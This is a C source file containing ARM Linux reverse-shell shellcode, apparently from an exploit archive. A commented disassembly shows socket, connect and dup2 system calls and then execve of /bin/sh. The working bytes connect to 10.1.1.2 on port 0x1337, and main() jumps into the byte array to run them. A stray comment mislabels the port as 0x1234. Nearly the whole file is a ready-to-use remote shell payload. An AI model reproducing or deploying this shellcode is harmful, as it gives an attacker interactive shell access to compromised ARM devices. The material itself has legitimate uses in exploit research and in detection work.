/*
Title:     Linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337)
Date:      2012-09-08
Tested on: ARM1176JZF-S (v6l)
Author:    midnitesnake

00008054 <_start>:
    8054:	e28f1001 	add	r1, pc, #1
    8058:	e12fff11 	bx	r1
    805c:	2002      	movs	r0, #2
    805e:	2101      	movs	r1, #1
    8060:	1a92      	subs	r2, r2, r2
    8062:	020f      	lsls	r7, r1, #8
    8064:	3719      	adds	r7, #25
    8066:	df01      	svc	1
    8068:	1c06      	adds	r6, r0, #0
    806a:	a108      	add	r1, pc, #32	; (adr r1, 808c <Dup+0x16>)
    806c:	2210      	movs	r2, #16
    806e:	3702      	adds	r7, #2
    8070:	df01      	svc	1
    8072:	273f      	movs	r7, #63	; 0x3f
    8074:	2102      	movs	r1, #2

00008076 <Dup>:
    8076:	1c30      	adds	r0, r6, #0
    8078:	df01      	svc	1
    807a:	3901      	subs	r1, #1
    807c:	d5fb      	bpl.n	8076 <Dup>
    807e:	a005      	add	r0, pc, #20	; (adr r0, 8094 <Dup+0x1e>)
    8080:	1a92      	subs	r2, r2, r2
    8082:	b405      	push	{r0, r2}
    8084:	4669      	mov	r1, sp
    8086:	270b      	movs	r7, #11
    8088:	df01      	svc	1
    808a:	46c0      	nop			; (mov r8, r8)
    808c:	37130002 	.word	0x37130002
    8090:	0301010a 	.word	0x0301010a
    8094:	6e69622f 	.word	0x6e69622f
    8098:	0068732f 	.word	0x0068732f
    809c:	00          	.byte	0x00
    809d:	00          	.byte	0x00
    809e:	46c0      	nop			; (mov r8, r8)
*/
#include <stdio.h>
#include <string.h>

#define SWAP16(x)	((x) << 8 | ((x) >> 8))

const unsigned char sc[] = {

	0x01, 0x10, 0x8F, 0xE2,
	0x11, 0xFF, 0x2F, 0xE1,

	0x02, 0x20, 0x01, 0x21,
	0x92, 0x1a, 0x0f, 0x02,
	0x19, 0x37, 0x01, 0xdf,
	0x06, 0x1c, 0x08, 0xa1,
	0x10, 0x22, 0x02, 0x37,
	0x01, 0xdf, 0x3f, 0x27,
	0x02, 0x21,

	0x30, 0x1c, 0x01, 0xdf,
	0x01, 0x39, 0xfb, 0xd5,
	0x05, 0xa0, 0x92, 0x1a,
	0x05, 0xb4, 0x69, 0x46,
	0x0b, 0x27,0x01, 0xdf,
	0xc0, 0x46,

	/* struct sockaddr */
	0x02, 0x00,
	/* port: 0x1234 */
	0x13, 0x37,
	/* ip: 10.1.1.2 */
	0x0A, 0x01, 0x01, 0x02,

	/* "/bin/sh\0" */
	0x2f, 0x62, 0x69, 0x6e,0x2f, 0x73, 0x68, 0x00
};

int main()
{
	printf("shellcode=%d bytes\n"
	       "connecting to %d.%d.%d.%d:%hd\n", sizeof sc,
		sc[0x3c], sc[0x3d], sc[0x3e], sc[0x3f],
		SWAP16(*((unsigned short *)(sc+0x3a))));
	return ((int (*)(void))sc)();
}